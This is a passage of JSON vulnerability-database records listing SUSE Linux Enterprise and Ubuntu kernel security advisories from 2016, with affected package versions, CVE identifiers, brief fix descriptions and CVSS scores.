"kernel-default-extra-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-extra", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-extra-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-ec2-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-ec2", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "ppc64le", "packageFilename": "kernel-default-3.12.60-52.54.2.ppc64le.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "ppc64le", "packageFilename": "kernel-syms-3.12.60-52.54.1.ppc64le.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "x86_64", "packageFilename": "kernel-obs-build-3.12.60-52.54.3.x86_64.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "ppc64le", "packageFilename": "kernel-default-devel-3.12.60-52.54.2.ppc64le.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-ec2-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-ec2-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "ppc64le", "packageFilename": "kernel-default-base-debuginfo-3.12.60-52.54.2.ppc64le.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_60-52_54-xen-1-2.3.x86_64.rpm", "packageName": "kgraft-patch-3_12_60-52_54-xen-1", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.3", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_60-52_54-default-1-2.3.x86_64.rpm", "packageName": "kgraft-patch-3_12_60-52_54-default-1", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "s390x", "packageFilename": "kernel-obs-build-debugsource-3.12.60-52.54.3.s390x.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-base-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "noarch", "packageFilename": "kernel-devel-3.12.60-52.54.1.noarch.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "x86_64", "packageFilename": "kernel-obs-build-debugsource-3.12.60-52.54.3.x86_64.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "x86_64", "packageFilename": "kernel-syms-3.12.60-52.54.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-devel-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-ec2-devel-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-ec2-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-debugsource-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "ppc64le", "packageFilename": "kernel-obs-build-3.12.60-52.54.3.ppc64le.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-debugsource-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-extra-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-extra-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-base-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "noarch", "packageFilename": "kernel-source-3.12.60-52.54.1.noarch.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-man-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default-man", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "noarch", "packageFilename": "kernel-source-3.12.60-52.54.1.noarch.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "noarch", "packageFilename": "kernel-macros-3.12.60-52.54.1.noarch.rpm", "packageName": "kernel-macros", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-base-debuginfo-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.1", "arch": "noarch", "packageFilename": "kernel-macros-3.12.60-52.54.1.noarch.rpm", "packageName": "kernel-macros", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "ppc64le", "packageFilename": "kernel-default-debuginfo-3.12.60-52.54.2.ppc64le.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Module for Public Cloud", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-ec2-extra-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-ec2-extra-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-base-debuginfo-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-xen-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "12", "packageVersion": "3.12.60-52.54.3", "arch": "noarch", "packageFilename": "kernel-docs-3.12.60-52.54.3.noarch.rpm", "packageName": "kernel-docs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "x86_64", "packageFilename": "kernel-default-devel-3.12.60-52.54.2.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "12", "packageVersion": "3.12.60-52.54.2", "arch": "s390x", "packageFilename": "kernel-default-3.12.60-52.54.2.s390x.rpm", "packageName": "kernel-default", "operator": "lt"}], "edition": 1, "description": "The SUSE Linux Enterprise 12 GA kernel was updated to receive one critical\n security fix.\n\n Security issue fixed:\n - CVE-2016-4997: A buffer overflow in 32bit compat_setsockopt iptables\n handling could lead to a local privilege escalation. (bsc#986362)\n\n", "reporter": "Suse", "published": "2016-06-30T21:09:07", "title": "Security update for the Linux Kernel (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-06-30T21:09:07", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00061.html", "id": "SUSE-SU-2016:1710-1", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-13T18:02:36", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_31-default-7", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_31-default-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_31-default-7", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_31-default-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_31-xen-7", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_31-xen-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_31-xen-7", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_31-xen-7-2.1.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-52_31 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-13T16:08:42", "title": "Security update for Linux Kernel Live Patch 9 for SLE 12 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-13T16:08:42", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00052.html", "id": "SUSE-SU-2016:3111-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-12T22:02:33", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "23.2", "packageName": "kgraft-patch-3_12_49-11-default-8", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_49-11-default-8-23.2.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "23.2", "packageName": "kgraft-patch-3_12_49-11-xen-8", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_49-11-xen-8-23.2.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.49-11 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-12T19:08:23", "title": "Security update for Linux Kernel Live Patch 0 for SLE 12 SP1 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-12T19:08:23", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00043.html", "id": "SUSE-SU-2016:3094-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-12T22:02:33", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-60_25-default-7", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-60_25-default-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-60_25-xen-7", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-60_25-xen-7-2.1.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-60_25 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-12T19:07:35", "title": "Security update for Linux Kernel Live Patch 2 for SLE 12 SP1 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-12T19:07:35", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00042.html", "id": "SUSE-SU-2016:3093-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-12T22:02:33", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_51-60_20-default-8", "packageFilename": "kgraft-patch-3_12_51-60_20-default-8-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Live Patching", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_51-60_20-xen-8", "packageFilename": "kgraft-patch-3_12_51-60_20-xen-8-2.1.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-60_20 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-12T19:14:13", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Security update for Linux Kernel Live Patch 1 for SLE 12 SP1 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-12T19:14:13", "id": "SUSE-SU-2016:3100-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00046.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-13T18:02:36", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_55-52_42-xen-4", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_55-52_42-xen-4-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_55-52_42-default-4", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_55-52_42-default-4-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_55-52_42-default-4", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_55-52_42-default-4-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_55-52_42-xen-4", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_55-52_42-xen-4-2.1.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.55-52_42 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-13T16:09:24", "title": "Security update for Linux Kernel Live Patch 12 for SLE 12 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-13T16:09:24", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00053.html", "id": "SUSE-SU-2016:3112-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-13T18:02:36", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_39-xen-6", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_39-xen-6-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_39-xen-6", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_39-xen-6-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_39-default-6", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_39-default-6-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-52_39-default-6", "arch": "x86_64", "packageFilename": "kgraft-patch-3_12_51-52_39-default-6-2.1.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-52_39 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-13T18:07:52", "title": "Security update for Linux Kernel Live Patch 11 for SLE 12 (important)", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-13T18:07:52", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00058.html", "id": "SUSE-SU-2016:3119-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-22T22:05:33", "references": ["https://bugzilla.suse.com/1012759", "https://bugzilla.suse.com/1003253", "https://bugzilla.suse.com/1012183"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_51-52_34-default-7", "packageFilename": "kgraft-patch-3_12_51-52_34-default-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_51-52_34-xen-7", "packageFilename": "kgraft-patch-3_12_51-52_34-xen-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_51-52_34-default-7", "packageFilename": "kgraft-patch-3_12_51-52_34-default-7-2.1.x86_64.rpm", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for SAP", "OSVersion": "12", "packageVersion": "2.1", "arch": "x86_64", "packageName": "kgraft-patch-3_12_51-52_34-xen-7", "packageFilename": "kgraft-patch-3_12_51-52_34-xen-7-2.1.x86_64.rpm", "operator": "lt"}], "edition": 1, "description": "This update for the Linux Kernel 3.12.51-52_34 fixes several issues.\n\n The following security bugs were fixed:\n - CVE-2016-8655: A race condition in the af_packet packet_set_ring\n function could be used by local attackers to crash the kernel or gain\n privileges (bsc#1012759).\n - CVE-2016-9555: The sctp_sf_ootb function in net/sctp/sm_statefuns.c in\n the Linux kernel lacks chunk-length checking for the first chunk, which\n allowed remote attackers to cause a denial of service (out-of-bounds\n slab access) or possibly have unspecified other impact via crafted SCTP\n data (bsc#1012183).\n - CVE-2016-7117: Use-after-free vulnerability in the __sys_recvmmsg\n function in net/socket.c in the Linux kernel allowed remote attackers to\n execute arbitrary code via vectors involving a recvmmsg system call that\n is mishandled during error processing (bsc#1003253).\n\n", "reporter": "Suse", "published": "2016-12-22T19:08:18", "type": "suse", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Security update for Linux Kernel Live Patch 10 for SLE 12 (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655", "CVE-2016-7117", "CVE-2016-9555"], "modified": "2016-12-22T19:08:18", "id": "SUSE-SU-2016:3249-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00089.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:53", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7117", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-7042"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0-115.157", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-3.2.0-115-omap", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "3.2.0.115.131", "arch": "noarch", "packageFilename": "UNKNOWN", 